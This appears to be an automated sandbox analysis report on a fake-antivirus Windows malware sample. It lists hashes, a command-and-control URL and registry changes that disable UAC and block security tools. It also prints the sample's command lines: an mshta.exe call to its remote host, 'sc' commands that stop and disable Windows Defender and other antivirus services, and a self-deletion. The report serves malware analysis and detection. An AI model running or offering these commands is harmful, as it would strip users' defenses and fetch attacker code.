Analysis
- max time kernel: 150s
- max time network: 167s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 25-11-2022 07:26
Static task: static1
Behavioral task: behavioral1
- Sample: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
- Resource: win7-20220812-en
Behavioral task: behavioral2
- Sample: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
- Resource: win10v2004-20220812-en
General
- Target: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
- Size: 2.7MB
- MD5: 25543861ba274d232c398bc842057def
- SHA1: 72fead8c6e44aade2f1f7df53a59d2258bdbc3d7
- SHA256: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad
- SHA512: 03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2
- SSDEEP: 49152:1b2JAKeNCqs5pTNkRLq7J7EzlbCFKmoeBbUkoqypczICPk:1bIAKeNCrtkFMJ7glbqIeBbUZHC
Malware Config
Extracted
http://galaint.releaseinfoupdate.pl/?0=126&1=2&2=1&3=118&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=ybpkowbwqh&14=1
Signatures
-
UAC bypass
Process: Protector-hcbi.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"
-
Disables taskbar notifications via registry modification
-
Executes dropped EXE 1 IoCs
Process: Protector-hcbi.exe
- PID 1328 Protector-hcbi.exe
-
Sets file execution options in registry 2 TTPs 64 IoCs
Process: Protector-hcbi.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[4].exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QuickHealCleaner.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SoftSafeness.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vcsetup.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intdel.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msa.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trojantrap3.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luau.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcproxy.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ave32.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bipcp.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllreg.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utpost.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winav.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\virusutilities.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ants.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\optimize.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tsadbot.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\serv95.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tds-3.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntispywarXP2009.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avnotify.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nsupdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwinst4.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpromenu.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavproxy.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\popscan.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atguard.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avptc32.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\belt.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exe.avxw.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exe.avxw.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prizesurfer.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wfindv32.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winupdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAhlp.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-agnt95.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fameh32.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibmavsp.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEShow.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ncinst4.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpdeluxe.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\etrustcipe.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jedi.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oasrv.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PC_Antispyware2010.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qh.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fast.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\normist.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alevir.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashLogV.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfiadmin.exe\Debugger = "svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssurf.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\driverctrl.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgserv9.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mslaugh.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavcl.exe\Debugger = "svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe\Debugger = "svchost.exe"
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 2 IoCs
Process: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
- PID 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
- PID 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
Process: Protector-hcbi.exe
- Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-hcbi.exe"
- Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run
-
Checks whether UAC is enabled
Process: Protector-hcbi.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
-
Drops file in System32 directory 3 IoCs
Process: Protector-hcbi.exe
- File opened for modification C:\Windows\SysWOW64\services.msc
- File opened for modification C:\Windows\SysWOW64\eventvwr.msc
- File opened for modification C:\Windows\SysWOW64\diskmgmt.msc
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Process: sc.exe
- PID 1984 sc.exe
- PID 1968 sc.exe
- PID 272 sc.exe
- PID 1700 sc.exe
- PID 1120 sc.exe
- PID 1032 sc.exe
- PID 1508 sc.exe
- PID 1072 sc.exe
- PID 1312 sc.exe
- PID 1928 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings
Processes: mshta.exe, Protector-hcbi.exe
- Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
- Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main (Protector-hcbi.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 (Protector-hcbi.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" (Protector-hcbi.exe)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Process: Protector-hcbi.exe
- PID 1328 Protector-hcbi.exe (64 identical entries)
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe, Protector-hcbi.exe
- Token: SeDebugPrivilege, PID 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
- Token: SeDebugPrivilege, PID 1328 Protector-hcbi.exe
-
Suspicious use of FindShellTrayWindow 4 IoCs
Process: Protector-hcbi.exe
- PID 1328 Protector-hcbi.exe (4 identical entries)
-
Suspicious use of SendNotifyMessage 4 IoCs
Process: Protector-hcbi.exe
- PID 1328 Protector-hcbi.exe (4 identical entries)
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe, Protector-hcbi.exe
- PID 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
- PID 1328 Protector-hcbi.exe (5 identical entries)
-
Suspicious use of WriteProcessMemory 52 IoCs
Processes: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe, Protector-hcbi.exe
Each row below appears four times in the report (52 entries in total).
- PID 1748 wrote to memory of 1328: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe -> Protector-hcbi.exe
- PID 1748 wrote to memory of 1720: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe -> cmd.exe
- PID 1328 wrote to memory of 1772: Protector-hcbi.exe -> mshta.exe
- PID 1328 wrote to memory of 1120: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 1032: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 1984: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 1508: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 1968: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 1072: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 1928: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 1312: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 272: Protector-hcbi.exe -> sc.exe
- PID 1328 wrote to memory of 1700: Protector-hcbi.exe -> sc.exe
-
System policy modification 1 TTPs 4 IoCs
Process: Protector-hcbi.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"
Processes
-
Depth 1: C:\Users\Admin\AppData\Local\Temp\9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe"
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 1748
-
Depth 2: C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
Command line: C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
- UAC bypass
- Executes dropped EXE
- Sets file execution options in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID: 1328
-
Depth 3: C:\Windows\SysWOW64\mshta.exe
Command line: mshta.exe "http://galaint.releaseinfoupdate.pl/?0=126&1=2&2=1&3=118&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=ybpkowbwqh&14=1"
- Modifies Internet Explorer settings
PID: 1772
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc stop WinDefend
- Launches sc.exe
PID: 1120
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc config WinDefend start= disabled
- Launches sc.exe
PID: 1032
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc stop msmpsvc
- Launches sc.exe
PID: 1984
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc config msmpsvc start= disabled
- Launches sc.exe
PID: 1508
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc stop AntiVirService
- Launches sc.exe
PID: 1072
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc config ekrn start= disabled
- Launches sc.exe
PID: 1968
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc stop GuardX
- Launches sc.exe
PID: 272
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc config AntiVirSchedulerService start= disabled
- Launches sc.exe
PID: 1312
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc config AntiVirService start= disabled
- Launches sc.exe
PID: 1928
-
Depth 3: C:\Windows\SysWOW64\sc.exe
Command line: sc config GuardX start= disabled
- Launches sc.exe
PID: 1700
-
Depth 2: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\954301~1.EXE" >> NUL
PID: 1720
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
- Filesize: 2.7MB
- MD5: 25543861ba274d232c398bc842057def
- SHA1: 72fead8c6e44aade2f1f7df53a59d2258bdbc3d7
- SHA256: 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad
- SHA512: 03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2